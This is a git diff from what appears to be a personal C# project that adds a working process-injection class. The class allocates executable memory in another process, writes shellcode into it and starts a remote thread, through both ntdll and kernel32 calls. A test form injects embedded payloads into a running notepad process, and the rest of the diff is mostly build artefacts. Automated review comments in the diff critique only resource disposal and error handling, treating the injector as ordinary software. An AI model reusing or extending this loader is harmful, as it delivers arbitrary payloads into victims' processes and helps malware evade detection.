+ this.ShellCode = shellCode;
+ this.RegionSize = (uint)shellCode.Length;
+ this.ptr = IntPtr.Zero;
+ this.Target = target;
+ }
+
+ public void LoadWithNT()
+ {
+ NT();
+ }
+
+ public void LoadWithKernel32()
+ {
+ Kernel32();
+ }
+
+ private void NT()
+ {
+ Imports.NtAllocateVirtualMemory(Target.Handle, ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr bytesWritten;
+ Imports.NtWriteVirtualMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+ Imports.PageProtection flOld = new Imports.PageProtection();
+ Imports.NtProtectVirtualMemory(Target.Handle, ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
+ IntPtr hThread = IntPtr.Zero;
+ Imports.NtCreateThreadEx(ref hThread, Imports.AccessMask.GENERIC_EXECUTE, IntPtr.Zero, Target.Handle, ptr, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
+ }
+
+ private void Kernel32()
+ {
+ this.ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr writtenBytes;
+ Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+ Imports.PageProtection flOld;
+ Imports.VirtualProtectEx(Target.Handle, ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
+ IntPtr hThread = Imports.CreateRemoteThread(Target.Handle, IntPtr.Zero, 0, ptr, IntPtr.Zero, Imports.ThreadCreationFlags.NORMAL, out hThread);
+ }
+
+ private static class Imports
+ {
+
+ internal const String KERNEL32 = "kernel32.dll";
+ internal const String NTDLL = "ntdll.dll";
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtCreateThreadEx(ref IntPtr threadHandle, AccessMask desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList);
+
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr VirtualAllocEx(IntPtr procHandle,IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool VirtualProtectEx(IntPtr procHandle, IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, ThreadCreationFlags dwCreationFlags, out IntPtr lpThreadId);
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr GetCurrentProcess();
+
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
+ public enum ThreadCreationFlags : uint
+ {
+ NORMAL = 0x0,
+ CREATE_SUSPENDED = 0x00000004,
+ STACK_SIZE_PARAM_IS_A_RESERVATION = 0x00010000
+ }
+
+ public enum AccessMask : uint
+ {
+ GENERIC_READ = 0x80000000,
+ GENERIC_WRITE = 0x40000000,
+ GENERIC_EXECUTE = 0x20000000,
+ GENERIC_ALL = 0x10000000
+ }
+
+ public enum PageProtection : uint
+ {
+ PAGE_EXECUTE = 0x10,
+ PAGE_EXECUTE_READ = 0x20,
+ PAGE_EXECUTE_READWRITE = 0x40,
+ PAGE_EXECUTE_WRITECOPY = 0x80,
+ PAGE_NOACCESS = 0x01,
+ PAGE_READONLY = 0x02,
+ PAGE_READWRITE = 0x04,
+ PAGE_WRITECOPY = 0x08,
+ PAGE_TARGETS_INVALID = 0x40000000,
+ PAGE_TARGETS_NO_UPDATE = 0x40000000,
+ PAGE_GUARD = 0x100,
+ PAGE_NOCACHE = 0x200,
+ PAGE_WRITECOMBINE = 0x400
+ }
+ public enum TypeAlloc : uint
+ {
+ MEM_COMMIT = 0x00001000,
+ MEM_RESERVE = 0x00002000,
+ MEM_RESET = 0x00080000,
+ MEM_RESET_UNDO = 0x1000000,
+ MEM_LARGE_PAGES = 0x20000000,
+ MEM_PHYSICAL = 0x00400000,
+ MEM_TOP_DOWN = 0x00100000,
+ MEM_WRITE_WATCH = 0x00200000
+ }
+ public enum FreeType : uint
+ {
+ MEM_DECOMMIT = 0x00004000,
+ MEM_RELEASE = 0x00008000,
+ MEM_COALESCE_PLACEHOLDERS = 0x00000001,
+ MEM_PRESERVE_PLACEHOLDER = 0x00000002
+ }
+ }
+
+ private bool _disposed = false;
+
+ // Instantiate a SafeHandle instance.
+ private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
+
+ // Public implementation of Dispose pattern callable by consumers.
+ public void Dispose() => Dispose(true);
+
+ // Protected implementation of Dispose pattern.
+ protected virtual void Dispose(bool disposing)
+ {
+ if (_disposed)
+ {
+ return;
+ }
+
+ if (disposing)
+ {
+ // Dispose managed state (managed objects).
+ _safeHandle?.Dispose();
+ }
+
+ _disposed = true;
+ GC.SuppressFinalize(this);
+ }
+ }
+}
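Review bot: `ShellCodeLoaderEx` defines `Dispose()` and `Dispose(bool)` but is declared as `public class ShellCodeLoaderEx`, without the interface, so it cannot be used in a `using` statement the way `ShellCodeLoader : IDisposable` can; the declaration should read `public class ShellCodeLoaderEx : IDisposable`. The only thing `Dispose` releases is `_safeHandle`, which wraps `IntPtr.Zero` and owns nothing, while the `hThread` locals in `NT()` and `Kernel32()` go out of scope without being closed. `GC.SuppressFinalize(this)` has no effect here because the class declares no finalizer. The class also has no summary comment; a short one stating that `NT()` and `Kernel32()` operate on the memory of the `Process` passed to the constructor, not the current process, would make the difference from `ShellCodeLoader` clear to readers.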
diff --git a/ShellCodeLoader/bin/Release/ShellCodeLoader.dll b/ShellCodeLoader/bin/Release/ShellCodeLoader.dll
new file mode 100644
index 0000000..770b70d
Binary files /dev/null and b/ShellCodeLoader/bin/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/bin/Release/ShellCodeLoader.pdb b/ShellCodeLoader/bin/Release/ShellCodeLoader.pdb
new file mode 100644
index 0000000..f11539b
Binary files /dev/null and b/ShellCodeLoader/bin/Release/ShellCodeLoader.pdb differ
diff --git a/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs b/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs
new file mode 100644
index 0000000..5d01041
--- /dev/null
+++ b/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index a8a6e50..7494a0d 100644
Binary files a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache
index e83d642..a4f84b8 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs b/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
new file mode 100644
index 0000000..5d01041
--- /dev/null
+++ b/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
index a606657..d5c5dc4 100644
Binary files a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
index a08e837..3a3c169 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-1c02f89cdd426da38f937db1d7ded7d8cbdc2708
+562235441aa9945ecc80c9dfdabd94dedabee3b8
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
index d8444df..363f2ce 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
@@ -3,4 +3,3 @@ F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\Release\ShellCodeLoader.pdb
F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.csproj.CoreCompileInputs.cache
F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.dll
F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.pdb
-F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.csproj.AssemblyReference.cache
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
index c12f470..770b70d 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb
index 345f2ae..f11539b 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb and b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb differ
diff --git a/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
new file mode 100644
index 0000000..5d01041
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs
new file mode 100644
index 0000000..e5dc9b8
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
diff --git a/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
new file mode 100644
index 0000000..1d70313
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..0aa6130
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..12784e8
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+1ba3ce01bd1fed7e622dc2a6a7acac9a7b78349d
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
new file mode 100644
index 0000000..8a6a532
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
@@ -0,0 +1,6 @@
+F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\x64\Release\ShellCodeLoader.dll
+F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\x64\Release\ShellCodeLoader.pdb
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.dll
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.pdb
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.csproj.AssemblyReference.cache
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll
new file mode 100644
index 0000000..614d1e7
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb
new file mode 100644
index 0000000..9c2dd1e
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb differ
diff --git a/Test/Form1.cs b/Test/Form1.cs
index 0928139..98766a9 100644
--- a/Test/Form1.cs
+++ b/Test/Form1.cs
@@ -1,4 +1,5 @@
using System;
+using System.Diagnostics;
using System.Windows.Forms;
/*
|| AUTHOR Arsium ||
@@ -19,25 +20,56 @@ public Form1()
private void button1_Click(object sender, EventArgs e)
{
- if (IntPtr.Size == 8)
- {
- ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
- cpp.LoadWithNT();
- cpp.Dispose();
- ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
- csharp.LoadWithNT();
- csharp.Dispose();
- }
- else
- {
- ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
- cpp.Asynchronous = true;
- cpp.LoadWithNT();
- cpp.Dispose();
- ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
- csharp.LoadWithNT();
- csharp.Dispose();
- }
+ /* if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }*/
+
+
+
+
+ Process Target = Process.GetProcessesByName("notepad")[0];
+ MessageBox.Show(Target.MainWindowTitle);
+ ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
+ cpp.LoadWithKernel32();
+ cpp.LoadWithNT();
+ cpp.Dispose();
+
+ /* if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoaderEx csharp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCSharp64.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoaderEx csharp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCSharp32.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }*/
+
}
private void button2_Click(object sender, EventArgs e)
{
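Review bot: `Process.GetProcessesByName("notepad")[0]` in the new body of button1_Click indexes the result without checking it, so the handler throws IndexOutOfRangeException whenever no process with that name is running. Check the array before indexing, e.g. `var found = Process.GetProcessesByName("notepad");` followed by `if (found.Length == 0) return;`. The `Process` objects returned by that call are never disposed, and `cpp.Dispose()` is skipped if `LoadWithKernel32()` or `LoadWithNT()` throws; a `using` block (if `ShellCodeLoaderEx` implements IDisposable, which this hunk does not show) or a try/finally would release the handles on every path. The two commented-out blocks around the live code are dead code that version control already preserves and would be better deleted than committed.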
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 391aa0c..c7f583d 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/Debug/Test.csproj.AssemblyReference.cache
index 9e11a68..68e392b 100644
Binary files a/Test/obj/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Debug/build.force b/Test/obj/Debug/build.force
new file mode 100644
index 0000000..e69de29
diff --git a/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache
new file mode 100644
index 0000000..29e521b
Binary files /dev/null and b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Release/Test.csproj.AssemblyReference.cache b/Test/obj/Release/Test.csproj.AssemblyReference.cache
index f5e894a..6522bf5 100644
Binary files a/Test/obj/Release/Test.csproj.AssemblyReference.cache and b/Test/obj/Release/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
index fc99eaf..053591b 100644
--- a/Test/obj/Release/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
@@ -8,6 +8,6 @@ F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Form1.resources
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Properties.Resources.resources
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.GenerateResource.cache
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
-F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.exe
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.pdb
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
index ef7cd64..b7f6513 100644
Binary files a/Test/obj/Release/Test.exe and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
index 1ebdc16..2dbd421 100644
Binary files a/Test/obj/Release/Test.pdb and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache
index 775dd3a..5314c1a 100644
Binary files a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
index 855dbe7..9b23b08 100644
--- a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
+++ b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-69ed1963c678b7433cfcad1463c463db4cb3db12
+e611841c91334bbfdd54b06c6f65ffef0d5bc2a6
diff --git a/Test/obj/x64/Debug/Test.exe b/Test/obj/x64/Debug/Test.exe
index 4347f89..5c22eda 100644
Binary files a/Test/obj/x64/Debug/Test.exe and b/Test/obj/x64/Debug/Test.exe differ
diff --git a/Test/obj/x64/Debug/Test.pdb b/Test/obj/x64/Debug/Test.pdb
index 4fd0d42..527d146 100644
Binary files a/Test/obj/x64/Debug/Test.pdb and b/Test/obj/x64/Debug/Test.pdb differ
diff --git a/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt
index d6aed18..854e59d 100644
--- a/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt
@@ -8,6 +8,5 @@ F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.Form1.resources
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.Properties.Resources.resources
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.GenerateResource.cache
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.CoreCompileInputs.cache
-F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.CopyComplete
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.exe
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.pdb
diff --git a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache
index ee0944a..976c1bd 100644
Binary files a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache and b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/x64/Release/Test.exe b/Test/obj/x64/Release/Test.exe
index 0629c45..a7f8284 100644
Binary files a/Test/obj/x64/Release/Test.exe and b/Test/obj/x64/Release/Test.exe differ
diff --git a/Test/obj/x64/Release/Test.pdb b/Test/obj/x64/Release/Test.pdb
index c2613dc..66ffc94 100644
Binary files a/Test/obj/x64/Release/Test.pdb and b/Test/obj/x64/Release/Test.pdb differ